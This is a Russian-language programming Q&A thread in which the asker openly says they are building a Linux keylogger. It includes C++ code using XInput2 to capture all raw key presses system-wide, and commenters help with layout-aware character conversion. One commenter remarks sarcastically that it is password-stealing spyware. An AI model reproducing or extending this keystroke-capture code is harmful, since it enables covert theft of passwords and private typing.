# KeyCode/KeySym в строковый символ

Tags: c++, linux, x11

Пишу кейлоггер под линукс (C++), ловлю нажатия через XInput2, но конвертация кейкодов в символы происходит только в английские буквы, независимо от выбранной раскладки.

```
// Register events:
Window root = DefaultRootWindow(display);
XIEventMask event_mask;
event_mask.deviceid = XIAllMasterDevices;
event_mask.mask_len = XIMaskLen(XI_LASTEVENT);
event_mask.mask = static_cast<unsigned char*>(calloc(event_mask.mask_len, sizeof(char)));
XISetMask(event_mask.mask, XI_RawKeyPress);
XISetMask(event_mask.mask, XI_KeyPress);

XISelectEvents(display, root, &event_mask, 1);
XSync(display, false);
free(event_mask.mask);

while (true) {
    XEvent event;
    XGenericEventCookie *cookie = &event.xcookie;
    XNextEvent(display, &event);

    if (
        XGetEventData(display, cookie) &&
        cookie->type == GenericEvent &&
        cookie->extension == xi_opcode
    ) {
        switch (cookie->evtype) {
            case XI_RawKeyPress: {
                XIDeviceEvent* ev = static_cast<XIDeviceEvent*>(cookie->data);

                KeySym keysym = XkbKeycodeToKeysym(display, ev->detail, 0, 0);
                if (keysym == NoSymbol) continue;
                char* str = XKeysymToString(keysym);
                if (str == NULL) continue;

                printf("%s\n", str); // Английские буквы, независимо от раскладки
                break;
            }
        }
    }
}
```

Пробовал передавать event.xkey в XLookupString внутри кейса - получаю пустоту.
Как правильно получить символ с учётом раскладки?

Comment: ну вы же указываете группу номер 0 (в просторечии — «первую раскладку») при вызове [XkbKeycodeToKeysym](https://www.x.org/archive/X11R7.5/doc/man/man3/XkbKeycodeToKeysym.3.html). что спрашиваете — то и получаете.

Comment: [XkbGetState](https://www.x.org/archive/X11R7.5/doc/man/man3/XkbGetState.3.html) вам в помощь.

Comment: @alexanderbarakin , поставил группу 1 - выводит строки вида "Cyrillic_pe" вместо "п", "Cyrillic_shorti" вместо "й" и т.д. Есть ли способ сконвертировать их в алфавит соответствующей локали?

Comment: совершенно не вижу, отчего бы благородному дону, пишущему «йет эназэ супа спай програм фо граб зэ пассводс оф зоуз стьюпид юзерс», не посмотреть на эталонную реализацию в виде программы *xev*.

Comment: xev использует XLookupString, который принимает XKeyEvent, в то время, как у меня XIEvent. Создал структуру XKeyEvent, заполнил поле keycode и все остальные поля, кроме state, получил английскую букву. Если заполняю state тем же, что выдаёт xev для русских букв (0x2000) - получаю пустоту.

Comment: Разобрался. Забыл добавить setlocale. @alexanderbarakin, спасибо за ответы.